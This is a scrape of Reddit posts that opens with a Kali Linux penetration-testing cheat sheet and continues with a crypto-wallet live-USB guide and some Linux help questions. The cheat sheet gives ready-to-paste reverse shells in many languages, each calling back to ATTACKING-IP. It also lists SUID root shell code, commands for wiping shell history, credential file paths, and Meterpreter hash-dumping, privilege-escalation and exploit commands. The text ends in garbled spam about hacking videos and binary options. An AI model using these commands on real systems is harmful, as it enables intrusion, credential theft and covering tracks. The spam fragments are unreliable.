The Python trick:

python -c 'import pty;pty.spawn("/bin/bash")' echo os.system('/bin/bash') /bin/sh -i

Misc Commands

init 6 - Reboot Linux from the command line.
gcc -o output.c input.c - Compile C code.
gcc -m32 -o output.c input.c - Cross compile C code, compile 32 bit binary on 64 bit Linux.
unset HISTORYFILE - Disable bash history logging.
rdesktop X.X.X.X - Connect to RDP server from Linux.
kill -9 $$ - Kill current session.
chown user:group blah - Change owner of file or dir.
chown -R user:group blah - Change owner of file or dir and all underlying files / dirs - recersive chown.
chmod 600 file - Change file / dir permissions, see Linux File System Permissons for details.
Clear bash history - $ ssh [email protected] | cat /dev/null > ~/.bash_history

Linux File System Permissions

777 rwxrwxrwx No restriction, global WRX any user can do anything.
755 rwxr-xr-x Owner has full access, others can read and execute the file.
700 rwx------ Owner has full access, no one else has access.
666 rw-rw-rw- All users can read and write but not execute.
644 rw-r--r-- Owner can read and write, everyone else can read.
600 rw------- Owner can read and write, everyone else has no access.

Linux File System

/ - also know as "slash" or the root.
/bin - Common programs, shared by the system, the system administrator and the users.
/boot - Boot files, boot loader (grub), kernels, vmlinuz
/dev - Contains references to system devices, files with special properties.
/etc - Important system config files.
/home - Home directories for system users.
/lib - Library files, includes files for all kinds of programs needed by the system and the users.
/lost+found - Files that were saved during failures are here.
/mnt - Standard mount point for external file systems.
/media - Mount point for external file systems (on some distros).
/net - Standard mount point for entire remote file systems - nfs.
/opt - Typically contains extra and third party software.
/proc - A virtual file system containing information about system resources.
/root - root users home dir.
/sbin - Programs for use by the system and the system administrator.
/tmp - Temporary space for use by the system, cleaned upon reboot.
/usr -Programs, libraries, documentation etc. for all user-related programs.
/var - Storage for all variable files and temporary files created by users, such as log files, mail queue, print spooler. Web servers, Databases etc.

Linux Interesting Files / Dir’s

Places that are worth a look if you are attempting to #privilege escalate / perform post exploitation.

Directory Description

/etc/passwd - Contains local Linux users.
/etc/shadow - Contains local account password hashes.
/etc/group - Contains local account groups.
/etc/init.d/ - Contains service init script - worth a look to see whats installed.
/etc/hostname - System hostname.
/etc/network/interfaces - Network interfaces.
/etc/resolv.conf - System DNS servers.
/etc/profile - System environment variables.
~/.ssh/ - SSH keys.
~/.bash_history - Users bash history log.
/valog/ - Linux system log files are typically stored here.
/vaadm/ - UNIX system log files are typically stored here.
/valog/apache2/access.log & /valog/httpd/access.log - Apache access log file typical path.
/etc/fstab - File system mounts.

Compiling Exploits

Identifying if C code is for Windows or Linux

C #includes will indicate which OS should be used to build the exploit.
process.h, string.h, winbase.h, windows.h, winsock2.h - Windows exploit code
arpa/inet.h, fcntl.h, netdb.h, netinet/in.h, sys/sockt.h, sys/types.h, unistd.h - Linux exploit code

Build Exploit GCC

gcc -o exploit exploit.c - Basic GCC compile

GCC Compile 32Bit Exploit on 64Bit Kali

Handy for cross compiling 32 bit binaries on 64 bit attacking machines.

gcc -m32 exploit.c -o exploit - Cross compile 32 bit binary on 64 bit Linux

Compile Windows .exe on Linux

i586-mingw32msvc-gcc exploit.c -lws2_32 -o exploit.exe - Compile windows .exe on Linux

SUID Binary

Often SUID C binary files are required to spawn a shell #as a superuser, you can update the UID / GID and shell #as required.

below are some quick copy and pate examples for #various #shells:

SUID C Shell for /bin/bash

int main(void){ setresuid(0, 0, 0); system("/bin/bash"); }

SUID C Shell for /bin/sh

int main(void){ setresuid(0, 0, 0); system("/bin/sh"); }

Building the SUID Shell binary

gcc -o suid suid.c
gcc -m32 -o suid suid.c - for 32bit

Setup Listening Netcat

Your remote shell will need a listening netcat instance #in order to connect back.

Set your Netcat listening shell on an allowed port

Use a port that is likely allowed via outbound firewall #rules on the target network, e.g. 80 / 443

To setup a listening netcat instance, enter the #following:

[email protected]:~# nc -nvlp 80 nc: listening on :: 80 ... nc: listening on 80 ...

NAT requires a port forward

If you're attacking machine is behing a NAT router, #you'll need to setup a port forward to the attacking #machines IP / Port.

ATTACKING-IP is the machine running your listening #netcat session, port 80 is used in all examples below #(for reasons mentioned above).

Bash Reverse Shells

exec /bin/bash 0&0 2>&0
0<&196;exec 196<>/dev/tcp/ATTACKING-IP/80; sh <&196 >&196 2>&196
exec 5<>/dev/tcp/ATTACKING-IP/80 cat <&5 | while read line; do $line 2>&5 >&5; done


while read line 0<&5; do $line 2>&5 >&5; done
bash -i >& /dev/tcp/ATTACKING-IP/80 0>&1

PHP Reverse Shell

php -r '$sock=fsockopen("ATTACKING-IP",80);exec("/bin/sh -i <&3 >&3 2>&3");' (Assumes TCP uses file descriptor 3. If it doesn't work, try 4,5, or 6)
Netcat Reverse Shell
nc -e /bin/sh ATTACKING-IP 80
/bin/sh | nc ATTACKING-IP 80
rm -f /tmp/p; mknod /tmp/p p && nc ATTACKING-IP 4444 0/tmp/p

Telnet Reverse Shell

rm -f /tmp/p; mknod /tmp/p p && telnet ATTACKING-IP 80 0/tmp/p
telnet ATTACKING-IP 80 | /bin/bash | telnet ATTACKING-IP 443

Remember to listen on 443 on the attacking machine also.

Perl Reverse Shell

perl -e 'use Socket;$i="ATTACKING-IP";$p=80;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};'

Perl Windows Reverse Shell

perl -MIO -e '$c=new IO::Socket::INET(PeerAddr,"ATTACKING-IP:80");STDIN->fdopen($c,r);$~->fdopen($c,w);system$_ while<>;'

perl -e 'use Socket;$i="ATTACKING-IP";$p=80;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};'

Ruby Reverse Shell

ruby -rsocket -e'"ATTACKING-IP",80).to_i;exec sprintf("/bin/sh -i <&%d >&%d 2>&%d",f,f,f)'

Java Reverse Shell

r = Runtime.getRuntime() p = r.exec(["/bin/bash","-c","exec 5<>/dev/tcp/ATTACKING-IP/80;cat <&5 | while read line; do \$line 2>&5 >&5; done"] as String[]) p.waitFor()

Python Reverse Shell

python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("ATTACKING-IP",80));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);["/bin/sh","-i"]);'

Gawk Reverse Shell

!/usbin/gawk -f

BEGIN { Port = 8080 Prompt = "bkd> "
 Service = "/inet/tcp/" Port "/0/0" while (1) { do { printf Prompt |& Service Service |& getline cmd if (cmd) { while ((cmd |& getline) > 0) print $0 |& Service close(cmd) } } while (cmd != "exit") close(Service) } 

Kali Web Shells

The following shells exist within Kali Linux, under /#usshare/webshells/ these are only useful if you are #able to upload, inject or transfer the shell to the #machine.

Kali PHP Web Shells

/usshare/webshells/php/php-reverse-shell.php - Pen Test Monkey - PHP Reverse Shell
/usshare/webshells/php/findsock.c - Pen Test Monkey, Findsock Shell. Build gcc -o findsock findsock.c (be mindfull of the target servers architecture), execute with netcat not a browser nc -v target 80
/usshare/webshells/php/simple-backdoor.php - PHP backdoor, usefull for CMD execution if upload / code injection is possible, usage:
/usshare/webshells/php/php-backdoor.php - Larger PHP shell, with a text input box for command execution.

Tip: Executing Reverse Shells

The last two shells above are not reverse shells, #however they can be useful for executing a reverse #shell.

Kali Perl Reverse Shell

/usshare/webshells/perl/ - Pen Test Monkey - Perl Reverse Shell
/usshare/webshells/perl/perlcmd.cgi - Pen Test Monkey, Perl Shell. Usage: /etc/passwd

Kali Cold Fusion Shell

/usshare/webshells/cfm/cfexec.cfm - Cold Fusion Shell - aka CFM Shell

Kali ASP Shell

/usshare/webshells/asp/ - Kali ASP Shells

Kali ASPX Shells

/usshare/webshells/aspx/ - Kali ASPX Shells

Kali JSP Reverse Shell

/usshare/webshells/jsp/jsp-reverse.jsp - Kali JSP Reverse Shell

TTY Shells

Tips / Tricks to spawn a TTY shell from a limited shell #in Linux, useful for running commands like su from #reverse shells.

Python TTY Shell Trick - python -c 'import pty;pty.spawn("/bin/bash")' - echo os.system('/bin/bash')
Spawn Interactive sh shell - /bin/sh -i
Spawn Perl TTY Shell - exec "/bin/sh"; perl —e 'exec "/bin/sh";'
Spawn Ruby TTY Shell - exec "/bin/sh"
Spawn Lua TTY Shell - os.execute('/bin/sh')

Spawn TTY Shell from Vi

Run shell commands from vi: - :!bash
Spawn TTY Shell NMAP - !sh

SSH Port Forwarding

ssh -L 9999: [email protected] - Port 9999 locally is forwarded to port 445 on through host

SSH Port Forwarding with Proxychains

ssh -D [email protected] - Dynamically allows all port forwards to the subnets availble on the target.

Meterpreter Payloads

Windows reverse meterpreter payload

set payload windows/meterpretereverse_tcp - Windows reverse tcp payload

Windows VNC Meterpreter payload

set payload windows/vncinject/reverse_tcp set ViewOnly false - Meterpreter Windows VNC Payload

Linux Reverse Meterpreter payload

set payload linux/meterpretereverse_tcp - Meterpreter Linux Reverse Payload

Meterpreter Cheat Sheet

Useful meterpreter commands.

upload file - c:\windows
Meterpreter upload file to Windows target - download c:\windows\repair\sam /tmp
Meterpreter download file from Windows target - download c:\windows\repair\sam /tmp
Meterpreter download file from Windows target - execute -f c:\windows\temp\exploit.exe
Meterpreter run .exe on target - handy for executing uploaded exploits
execute -f cmd -c - Creates new channel with cmd shell
ps - Meterpreter show processes
shell - Meterpreter get shell on the target
getsystem - Meterpreter attempts priviledge escalation the target
hashdump - Meterpreter attempts to dump the hashes on the target
portfwd add –l 3389 –p 3389 –r target - Meterpreter create port forward to target machine
portfwd delete –l 3389 –p 3389 –r target - Meterpreter delete port forward

Common Metasploit Modules

Top metasploit modules.

Remote Windows Metasploit Modules (exploits)

use exploit/windows/smb/ms08_067_netapi - MS08_067 Windows 2k, XP, 2003 Remote Exploit
use exploit/windows/dcerpc/ms06_040_netapi - MS08_040 Windows NT, 2k, XP, 2003 Remote Exploit
use exploit/windows/smb/ms09_050_smb2_negotiate_func_index - MS09_050 Windows Vista SP1/SP2 and Server 2008 (x86) Remote Exploit

Local Windows Metasploit Modules (exploits)

use exploit/windows/local/bypassuac - Bypass UAC on Windows 7 + Set target + arch, x86/64

Auxilary Metasploit Modules

use auxiliary/scannehttp/dir_scanner - Metasploit HTTP directory scanner
use auxiliary/scannehttp/jboss_vulnscan - Metasploit JBOSS vulnerability scanner
use auxiliary/scannemssql/mssql_login - Metasploit MSSQL Credential Scanner
use auxiliary/scannemysql/mysql_version - Metasploit MSSQL Version Scanner
use auxiliary/scanneoracle/oracle_login - Metasploit Oracle Login Module

Metasploit Powershell Modules

use exploit/multi/script/web_delivery - Metasploit powershell payload delivery module
post/windows/manage/powershell/exec_powershell - Metasploit upload and run powershell script through a session
use exploit/multi/http/jboss_maindeployer - Metasploit JBOSS deploy
use exploit/windows/mssql/mssql_payload - Metasploit MSSQL payload

Post Exploit Windows Metasploit Modules

run post/windows/gathewin_privs - Metasploit show privileges of current user
use post/windows/gathecredentials/gpp - Metasploit grab GPP saved passwords
load mimikatz -> wdigest - Metasplit load Mimikatz
run post/windows/gathelocal_admin_search_enum - Idenitfy other machines that the supplied domain user has administrative access to

CISCO IOS Commands

A collection of useful Cisco IOS commands.

enable - Enters enable mode
conf t - Short for, configure terminal
(config)# interface fa0/0 - Configure FastEthernet 0/0
(config-if)# ip addr - Add ip to fa0/0
(config-if)# ip addr - Add ip to fa0/0
(config-if)# line vty 0 4 - Configure vty line
(config-line)# login - Cisco set telnet password
(config-line)# password YOUR-PASSWORD - Set telnet password

show running-config - Show running config loaded in memory

show startup-config - Show sartup config

show version - show cisco IOS version

show session - display open sessions

show ip interface - Show network interfaces

show interface e0 - Show detailed interface info

show ip route - Show routes

show access-lists - Show access lists

dir file systems - Show available files

dir all-filesystems - File information

dir /all - SHow deleted files

terminal length 0 - No limit on terminal output

copy running-config tftp - Copys running config to tftp server

copy running-config startup-config - Copy startup-config to running-config


Hash Lengths

MD5 Hash Length - 16 Bytes
SHA-1 Hash Length - 20 Bytes
SHA-256 Hash Length - 32 Bytes
SHA-512 Hash Length - 64 Bytes

SQLMap Examples

sqlmap -u --forms --batch --crawl=10 --cookie=jsessionid=54321 --level=5 --risk=3 - Automated sqlmap scan
sqlmap -u TARGET -p PARAM --data=POSTDATA --cookie=COOKIE --level=3 --current-user --current-db --passwords --file-read="/vawww/blah.php" - Targeted sqlmap scan
sqlmap -u "" --dbms=mysql --tech=U --random-agent --dump - Scan url for union + error based injection with mysql backend and use a random user agent + database dump
sqlmap -o -u "" --forms - sqlmap check form for injection
sqlmap -o -u "http://meh/vuln-form" --forms -D database-name -T users --dump - sqlmap dump and crack hashes for table users on database-name
submitted by LubuntuFU to Kalilinux [link] [comments]

Build your wallets on a flash drive with a live Linux OS

You will need to customize your build to suit your needs, but I picked wallets of the major currencies. For example I picked jaxx because it provides anonymous addresses for multiple currencies that can be used to move funds and accept funds with out giving personal details. I attempted to provide reliable source information but make no claims to the security of any of these applications. Be sure to research the tools used in your build. This is just a good frame work for building a portable wallet with "pretty good security". It provides a means to build portable wallets, hardware wallets, and back up your build to DVD for loss prevention with all of it, backups included being password protected and encrypted.
Install a debian type distribution to a flash drive. 8GB will work, but 32GB or 64GB will provide some additional space to work with. These instructions will work for Debian, Ubuntu, Mint, or any other related distribution.
The installation instructions are easy to follow, but during the installation phase. I would recommend configuring grub to install to the flash drive rather than the main drive of the computer during the creation of the partitions. Also, encrypt your home folder to prevent casual browsing of the files with some other operating system.
Detailed instructions for your version of linux can be found easily by searching for"install linux version to flash drive."
Install Debian
Install Mint
Install Ubuntu
Applications and app images can be installed to your home folder and those contents will be protected from observation if the drive is lost.

Your system can also be protected from loss with Pinguy Builder.

If you are careful about what is installed it is easy to build a wallet that will fit on a DVD. Keep the fat down to a minimum and a backup can be built with Pinguy Builder.
Pinguy Builder is currently hosted in Sourceforge website. Head over to the following URL and download the latest Pinguy Builder version.
Download Pinguy Builder
First install Gdebi package. Gdebi will take care of all necessary dependencies while installing a software.
$ sudo apt-get install gdebi
Go to the download location, and then install Pinguy Builder as shown below.
$ sudo gdebi pinguybuilder_4.3-6_all-beta.deb

CryptoCurrency Linux Build

Install wget

$ sudo apt-get install wget

Install GDBI Package Manager

$ sudo apt-get install -gdebi
$ sudo dpkg -i FileName.deb
$ sudo apt-get install -f

Install github fuse (Runs github AppImages)

$ sudo apt-get install fuse
$ sudo modprobe fuse
$ sudo groupadd fuse
sudo usermod -a -G fuse $user

Install Curl

$ sudo apt-get install curl

Install Browsers

Remove Firefox / Thunderbird

$ sudo apt remove firefox
$ sudo apt remove thunderbird

Add Chromium Browser

Chromium is a good choice because it supports the tor, jaxx, metamask, and ledger nano extensions. This makes the wallets and apps easily supported between devices and operating systems.
$Chromium sudo apt install -y chromium-browser
If you need Flash, run the following command. $ sudo apt install -y pepperflashplugin-nonfree
$ sudo update-pepperflashplugin-nonfree --install
I typically configure chromium to open in incognito mode by editing the application entry in .
You have to change one line in the chromium-browser.desktop file. The best is to do that locally:
Copy the file from /usshare/applications to /home/yourname/.local/share/applications
Open the file with gedit (open gedit and drag the local desktop file on to the gedit window)
Find the first line in the file that begins with Exec=
Replace the line by Exec=chromium-browser --incognito


An additional browser may be helpful for non- crypto related browsing. I currently like the Brave browser or the tor browser.
For AMD64: $ wget -O brave.deb
$ sudo dpkg -i ./brave.deb
$ sudo apt-get install -f

Install TOR

$ sudo apt install tor Start Service
$ sudo /etc/init.d/tor start
Verify Service
$ ps aux|grep tor
$ systemctl status tor
Start TOR Service on Boot
$ sudo update-rc.d tor enable

Tor Browser

$ sudo add-apt-repository ppa:webupd8team/tor-browser
$ sudo apt-get update
$ sudo apt-get install tor-browser

Install hashrat

Install hashrat / standardnotes Install hashrat to verify checksums.
$ sudo apt-get install hashrat
Use man page for details
$ man hashrat
Verify the check sums of all software when downloaded from reputable sources with hashrat. See the man file for syntax with the following command.

Communications Programs

Installing standalone Signal Desktop

Download the repository's key and install it into the system
$ curl -s | sudo apt-key add -
$ sudo add-apt-repository "deb [arch=amd64] xenial main"
$ sudo apt update
$ sudo apt install signal-desktop

Install Telegram

$ sudo add-apt-repository ppa:atareao/telegram
$ sudo apt-get update
$ sudo apt-get install telegram

Installing standalone Signal Desktop

First, use this command to download the repository's key and install it into the system
$ curl -s | sudo apt-key add -
Next, use this one to add the repository itself to the system
$ sudo add-apt-repository "deb [arch=amd64] xenial main"
Then update the package database
$ sudo apt update
Finally, install the Signal Desktop
$ sudo apt install signal-desktop

Install JAXX Wallet -

This can be done as an app image or as a chromium extension
Copy jaxx-1.3.15-x86_64.AppImage to \Documents\wallets
Jaxx requires Ubuntu 12.04, Fedora 21, or Debian 8 (or later)
$sha1sum jaxx-1.3.15-x86_64.AppImage
sudo chmod 777 jaxx-1.3.15-x86_64.AppImage ./jaxx-1.3.15-x86_64.AppImage

Install Ledger Nano S
Download Ledger Live
On most Linux systems, USB devices are mapped with read-only permissions by default. To open a device through this API, your user will need to have write access to it too. A simple solution is to set a udev rule. Create a file /etc/udev/rules.d/50-yourdevicename.rules with the following content:
SUBSYSTEM=="usb", ATTR{idVendor}=="[yourdevicevendor]", MODE="0664", GROUP="plugdev"
$ sudo wget -q -O - | sudo bash
If the system won't update the UDEV rules with the file copy the UDEV Directory to /etc/udev/ Run nautilus as root
$sudo nautilus
Use the File Explorer to copy the UDEV direstory to /etc/udev/

Install Ledger Chrome Extentions

Install Ledger Wallet - Ripple

Execute the installation in /home/username/Documents/Wallet
$ sudo dpkg -i ledger_wallet_ripple_linux_x64_1.0.3.deb
$ sudo apt-get install -f

[Install Ledger Wallet - NEO

Neon also provides software wallets for neo and nep-5 tokens
Download the .deb file for ubuntu from here : Once downloaded...
.deb file Install $ sudo dpkg -i Neon_0.2.4_amd64.Linux.deb $ sudo apt-get install -f
AppImage file Install Linux AppImage: ed1011f895b145a43bf65f9b288755848445391d680ce33f9860e990c84fdde8 sha256sum Neon-0.2.2-x86_64.Linux.AppImage sudo chmod 777 Neon-0.2.2-x86_64.Linux.AppImage ./Neon-0.2.2-x86_64.Linux.AppImage

Install Monero

Before proceeding with the compilation, the following packages are required:

update Ubuntu's repository

$ sudo apt update
Install dependencies to be able to compile Monero
$ sudo apt install build-essential cmake libboost-all-dev miniupnpc libunbound-dev graphviz doxygen libunwind8-dev pkg-config libssl-dev libcurl4-openssl-dev libgtest-dev libreadline-dev libminiupnpc-dev libzmq3-dev
Monero Official Download Links
Windows, 64-bit
macOS, 64-bit
Linux, 64-bit
Note: for these examples I'm using the file monero-linux-x64-v0.12.0.0.tar.bz2. Replace this file name with the current release file name.
$tar xjf monero-linux-x64-v0.12.0.0.tar.bz2
How you compile a program from a source
  1. open a console
  2. use the command cd to navigate to the correct folder. If there is a README file with installation instructions, use that instead.
  3. extract the files with one of the commands If it's tar.gz use tar xvzf PACKAGENAME.tar.gz if it's a tar.bz2 use tar xvjf PACKAGENAME.tar.bz2
./configure make sudo make install
github Download Site
Check Hashes at: $ hashrat -sha256 monero-gui-linux-x64-v0.12.0.0.tar.bz2 $ hashrat -sha256 monero-linux-x64-v0.12.0.0.tar.bz2
Move the Monero applications to /Documents/wallet/monero/ or /usshare/bin/ or where you decide to install applications.

Compilation - This will take some research to do properly. I recommend downloading the tar file, check the hash against the SHA256 and make the file executable. But for those that want to compile from source here are my notes. I have done it, but it is involved and not a rookie task.

$ cd / (Change Directory to Root)
$ sudo mkdir -p /build/release/bin/
$ cp /home/dillingeDownloads/monero-gui-linux-x64-v0.12.0.0.tar.bz2 /build/release/bin/
$ cd /build/release/bin/

download the latest Monero source code from github

$ sudo git clone --recursive

From inside /build/release/bin/ check the directory with ls to verify the directory /monero/ in the directory /build/release/bin/

Compile the release version. make # or make -j number_of_threads, e.g., make -j 2
$ cd monero
$ sudo make

go into monero folder

$ cd monero/
$ cd /
$ sudo mkdir -p /opt/monero
$ sudo mv -v ./build/release/bin/monero/* /opt/monero/
$ cd /opt/monero/

alternatively make release can be used instead of make. This compiles

the source code without compiling unique tests which is faster, and can

avid problems if there are compilation errors with compiling the tests

Installationcd After successful compilation, the Monero binaries should be located in ./build/release/bin. I usually move the binaries into /opt/monero/ folder. This can be done as follows:


This should result in:
/opt/monero/ ├── monero-blockchain-export ├── monero-blockchain-import ├── monerod └── monero-wallet-cli Now we can start the Monero daemon, i.e., monerod, and let it download the blockchain and synchronize itself with the Monero network. After that, you can run your the monero-wallet-cli.

launch the Monero daemon and let it synchronize with the Monero network

$ /opt/monero/monerod

launch the Monero wallet

/opt/monero/monero-wallet-cli Useful aliases (with rlwrap) monerod and monero-wallet-cli do not have tab-compliton nor history. This problem can be overcome using rlwrap.
Alternate Information and Source /

install rlwrap

$ sudo apt install rlwrap

download monerod and monero-wallet-cli commands files

wget -O ~/.bitmonero/monerocommands_simplewallet.txt
Use a remote node to avoid the size of the Monero blockchain
Connecting to the node from the GUI wallet After you enter your password for your wallet, you will see a pop up that will give you the option to "use custom settings". Click on it. You will then be sent to the "Settings" page in the GUI. At this point you should see two text boxes to the right of a label that says "Daemon address". In the first box (the one to the left) you need to enter the address of the node that you want to connect to. This address might look like or it could look like any old ip address. The smaller box to the right is where you enter the node's port. The default port is 18081 but if you are using a random node the port that is used will vary. The port for uses 18089. 18081 18089

Customize Desktop

Edit Log In Image
$ sudo apt install lightdm-gtk-greeter-settings
$ pkexec lightdm-gtk-greeter-settings
Edit Grub Sttings
$ sudo gedit /etc/default/grub
$ sudo update-grub

This article is provided by u/blackfootradio at cryptotux

submitted by blackfootradio to CryptoTux [link] [comments]

chmod an app?

I've seen chmod used for files/directory permissions but not on an app...
I just read this on a github issue:
But my scenario is that I just wanted to develop and test files in Apache Server's /vawww/html folder. So, I just provided all read write access to my Atom using "chmod 777 atom" .It has started to compile and write code in the directory.
Why they chose to resolve that by chmodding their text editor (atom) I don't know. It'd run as their user and I guess they needed root permissions for the location they wanted to write to. Normally you'd change permissions of the location, though not always an option such as with /etc/. Not sure how chmod 777 atom gives root read/write permissions to that location, perhaps they also ran atom with elevated permissions)
IIRC, atom isn't a binary but a rather lengthy shellscript that later calls a binary after doing some logic, which makes it difficult to run as root for editing root owned files. The shell script would run as root but the actual application wouldn't have rights to save as root(github issue).
I guess they did this because atom is a shell script rather than a binary? Still not something I've seen(usually you use sudo, or more preferred gksu/kdesu or pkexec to run an app as root right?).
submitted by kwhali to linuxquestions [link] [comments]

Help getting my controller to work in emulators, and saving states

Hi there! I had a pi 2 and recently tried to get a static IP address on it, but I did something which caused it to not boot into EmulationStation anymore. Even undoing the changes I made in the config file was not working; it would give errors on boot and stay on the text screen. So I decided to make a backup of the SD card, copy my roms folder and the config folder and start over. I also bought a pi 3 to start over with.
I put the latest RetroPie image on the SD card, copied my roms and config folder, and booted it up. I can get in and launch the roms, but my controller doesn't do anything inside the N64 emulator. The only buttons I can get to do anything are Select + Bottom Left Trigger for load state (which says state failed to load, even though I copied a state from my previous pi), and Select + Start to get back to EmulationStation. Strangely, Select + Bottom Right Trigger does not save a state. In the SNES emulator, most buttons seem to work but when I try to save a state, nothing happens (no error) so then trying to load a state fails, since none exist. I can't see any option to map my controller on a per-emulator basis.
I have looked through the config menus that I could find, and I did not see anything that helped. I ran the option to set up RetroPie from binaries, I tried modifying retroarch.cfg, and I ran sudo chmod 777 * on the roms directory, which did change the permissions but did not resolve any issues. I then found the option in the setting to fix ownership in the roms directory automatically, but I am still having the same issues.
I am using a wireless Xbox 360 controller, which works in the EmulationStation. I did turn on the Xbox controller driver option.
I'm sure I am missing something here, could you please direct me to the relevant wiki articles or just let me know how you have resolved these issues when you had them? Any suggestions would be appreciated. At this point, I am willing to wipe it again and start over, if I can copy my save files for Ocarina of Time.
Bonus points would be if I can set up a static IP address for the pi.
submitted by cooldug000 to RetroPie [link] [comments]

'Standard' ls command on busybox?

Hi all
I'm wondering if it is possible to run the standard version of 'ls' on my busybox device. The busybox version of ls lacks the --time-style option, which I need.
At first I thought I could copy in a binary from another device/distro (Raspian, both devices are ARM-based) with the correct ls command, from /bin/ls, but this didn't work. My busybox device says: "-sh: /usbin/ls: not found"
Even though it is there, with chmod 777 and +x.
Anyone have any ideas?
submitted by TobbenTM to linux [link] [comments]

Termux %100 Gerçek Konum Bulma 2020 Türkçe Как Вычислить Злоумышленнику По IP(Seeker) Writable folder DVWA Error Как стать хакером в ВК на Андроид/ как взламывать ВК в Termux!‍ Goldcoders Hyip Manager Pro 2020 - Full Installation - SMS Bomber Гайд На Termux (Без Root) How To Install LAMP Stack and WordPress on Ubuntu localhost

Chmod 777 Binary Options November 19, 2017 Get link; Facebook; Twitter; Pinterest; Email; Other Apps Tuesday, October 4, 2016. Chmod 777 Binary Options Thursday, 3 August 2017. Chmod 777 Binary Options May. 5. Chmod 777 Binäre Option Chmod 777 options. When chmod is applied to a directory: read = list files in the directory; write = add new files to the directory ; execute = access files in the directory. Dec 1, 2012 You may know that you need to set a file permission of "777" to make it writable, but do you know what does "chmod 777" really means. Chmod (change mode) is one of the most frequently used commands in unix or ... Ja sehr richtig, dass die option-R bei chmod Befehl werden die Dateien/Unterverzeichnissen unter dem angegebenen Verzeichnis erhalten 777 Berechtigung. Aber im Allgemeinen es ist nicht eine gute Praxis zu geben 777 auf alle Dateien und Verzeichnisse, wie es kann dazu führen das Daten-Sicherheit. Versuchen Sie sehr spezifisch auf die Angabe der alle Rechte auf alle Dateien und Verzeichnisse. chmod -R 777 /www/store. The -R (or --recursive) options make it recursive. Or if you want to make all the files in the current directory have all permissions type: chmod -R 777 ./ If you need more info about chmod command see: File permission. share improve this answer follow edited Apr 23 '19 at 22:31. Sameer. 3,263 4 4 gold badges 27 27 silver badges 55 55 bronze badges. answered Nov ... Friday, 15 March 2019. Chmod 777 binary option Tuesday, 12 December 2017. Chmod 777 binário opção chmod 777 / path / to / file Hopefully, this article helped you better understand file permissions in Unix systems and the origin of the magical number “777.” Now that you’ve mastered file permissions, you may want to learn how to copy and paste text, files and folders in the Linux terminal or use sticky bit to manage files on shared directories .

[index] [10468] [28677] [15341] [11021] [5092] [8498] [5699] [5463] [2438] [16586]

Termux %100 Gerçek Konum Bulma 2020 Türkçe

Все команды в видео apt update apt upgrade pkg install python pkg install python2 apt install git git clone ... chmod 777 bash Seçenek 2 = Paket kurulumu yap İNSTAGRAM = @termuxegitim #termux #termuxegitim #hack #hacking #pentest #phishing, #termuxegitim, #hack, #hacking, # ... chmod 755 and chmod 644 not chmod 777 - Understanding WordPress Server File Permissions - Duration: 5 ... Best Binary Options Strategy 2020 - 2 Minute Strategy LIVE TRAINING! - Duration: 43:42 ... 6.chmod 777 7../ 8../ -t manual 9.открываем новую ссесию 10.ngrok http 8080 11.копируем ссылку и отпрвим зл� install goldcoders hyip manager pro script - version 2020-----step principal 1 8. chmod 777 9. bash 10. fish 11. run 2 сессия: 12. apt install openssh 13. ssh -R 80: localhost:8080 Ссылка на мой вк: ... chmod 755 and chmod 644 not chmod 777 - Understanding WordPress Server File Permissions - Duration: 5 ... Best Binary Options Strategy 2020 - 2 Minute Strategy LIVE TRAINING! - Duration: 43:42 ...